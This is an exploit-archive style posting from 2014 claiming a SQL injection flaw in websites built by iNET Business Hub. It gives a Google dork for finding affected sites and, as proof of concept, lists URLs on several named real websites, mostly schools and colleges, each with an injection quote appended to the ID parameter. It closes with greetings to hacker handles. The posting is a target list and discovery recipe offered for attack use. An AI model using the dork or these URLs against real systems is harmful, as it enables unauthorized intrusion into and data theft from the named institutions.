iNET Business Hub suffers from a remote SQL injection vulnerability. Note that this finding houses site-specific data.
25209707f9ad4f0be972a7364bb0b33452e8dc208447254b5f94bb048379e372
==== Exploit Author:Ʈɦƹ RǿȼƙȿƮƹř ====
# Exploit Title: iNET Business Hub SQL injetion
# Date: 04.02.2014
# Email: th3rockst3r@gmail.com
# Vendor: http://www.inetbusinesshub.com/
# Facebook: Facebook.com/thee.rocksTer
# Google Dork: inurl:.php?id= intext:Website Designed & Developed by iNET
Business Hub
Proof Of Concept:
1. http://www.sbss.in/newsDetails.php?c=1&ID=1%27
2. http://karnalinstitutions.org/newsDetails.php?ID=4%27
3. http://mamc.edu.in/newsDetails.php?ID=13%27
4. http://www.thesirsaschool.com/newsDetails.php?c=1&ID=6%27
5. http://www.mdesnarwana.com/newsDetails.php?c=1&ID=2%27
6. http://www.thesirsaschool.com/newsDetails.php?c=1&ID=6%27
# Greetz:Back Bone,Demon,Orions Hunter,Dark Knight Sparda,Gh0st
KilL3r,Luge,Code Breaker,Darklord,Devil Prince,Rakhal Beduin,Bakeer
Bhai,R007 C0D3,Dipto,8l@ck 3xplor3r,
Sparrow,Bd Matrix,Cyber Blader,Batchfweak,BD BLACK HAT and All Bangladeshi
Hackers